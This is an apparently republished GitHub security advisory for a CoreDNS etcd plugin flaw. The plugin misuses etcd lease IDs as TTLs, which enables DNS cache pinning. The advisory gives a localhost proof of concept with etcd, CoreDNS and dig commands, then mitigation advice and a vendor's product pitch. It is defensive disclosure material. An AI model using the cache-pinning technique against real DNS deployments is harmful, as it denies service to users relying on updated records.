GHSA-93mf-426m-g6x9
HIGHCoreDNS: DNS Cache Pinning via etcd Lease ID Confusion
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
github.com/coredns/corednsReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling cache pinning for very long periods. This can effectively cause a denial of service for DNS updates/changes to affected services.
Details
In plugin/etcd/etcd.go, the TTL() function casts the 64-bit etcd lease ID to a uint32 and uses it as the TTL:
func (e *Etcd) TTL(kv *mvccpb.KeyValue, serv *msg.Service) uint32 {
etcdTTL := uint32(kv.Lease) // BUG: Lease ID != TTL duration
// ... rest of function uses etcdTTL as actual TTL
}
Lease IDs are identifiers, not durations. Large lease IDs can produce very large TTLs after truncation, causing downstream resolvers and clients to cache answers for years.
This enables cache pinning attacks, such as:
- Attacker has etcd write access (compromised service account, misconfigured RBAC/TLS, exposed etcd, insider).
- Attacker writes/updates a key and attaches any lease (the actual lease duration is irrelevant; the ID is misused).
- CoreDNS serves the record with an extreme TTL; downstream resolvers/clients cache it for a very long time.
- Even after fixing/deleting the key (or restarting CoreDNS), clients continue to use the cached answer until their caches expire or enforce their own TTL caps.
Some resolvers implement TTL caps, but values and defaults vary widely and are not guaranteed.
PoC
- Launch etcd:
etcd \
--data-dir ./etcd-data \
--listen-client-urls http://127.0.0.1:2379 \
--advertise-client-urls http://127.0.0.1:2379 \
--listen-peer-urls http://127.0.0.1:2380 \
--initial-advertise-peer-urls http://127.0.0.1:2380 \
--initial-cluster default=http://127.0.0.1:2380 \
--name default \
--initial-cluster-token etcd-ttl-poc \
--initial-cluster-state new &
- Prepare CoreDNS configuration:
cat > Corefile << 'EOF'
skydns.local {
etcd {
path /skydns
endpoint http://localhost:2379
debug
}
log
errors
}
EOF
- Launch CoreDNS:
coredns -conf Corefile -dns.port=1053
- Create an etcd record called
large-lease-servicewith a lease grant of 1 hour:
LEASE_ID=$(etcdctl --endpoints=http://127.0.0.1:2379 lease grant 3600 | awk '{print $2}')
etcdctl --endpoints=http://127.0.0.1:2379 put /skydns/local/skydns/large-lease-service '{
"host": "192.168.1.101",
"port": 8080
}' --lease=$LEASE_ID
- Verify the lease details:
$ etcdctl lease timetolive $LEASE_ID
lease 7c4a98dd35b75c23 granted with TTL(3600s), remaining(3252s)
- Query the DNS record and observe the record TTL at 28 years:
$ dig +noall +answer @127.0.0.1 -p 1053 large-lease-service.skydns.local A
large-lease-service.skydns.local. 901209123 IN A 192.168.1.101
Impact
Affects any CoreDNS deployment using the etcd plugin for service discovery.
- Availability: High as service changes (IP rotations, failovers, rollbacks) may be ignored for extended periods by caches.
- Integrity: Low as stale/incorrect answers persist abnormally long. (Note: attacker with etcd write could already point to malicious endpoints; the bug magnifies persistence.)
- Confidentiality: None.
The bug was introduced in #1702 as part of the CoreDNS v1.2.0 release.
Mitigation
The TTL function should utilise etcd's Lease API to determine the proper TTL for leased records. Add configurable limits for minimum and maximum TTL when passing lease records, to clamp potentially extreme TTL values set as lease grant.
Credit
Thanks to @thevilledev for disclovering this vulnerability and contributing a fix.
For more information
Please consult our security guide for more information regarding our security process.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/coredns/coredns | ≥ 1.2.0&&< 1.12.4 | 1.12.4 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/coredns/coredns. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/coredns/coredns to 1.12.4 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-93mf-426m-g6x9 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-93mf-426m-g6x9 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-93mf-426m-g6x9. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-93mf-426m-g6x9 in your dependencies?
O3 detects GHSA-93mf-426m-g6x9 across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.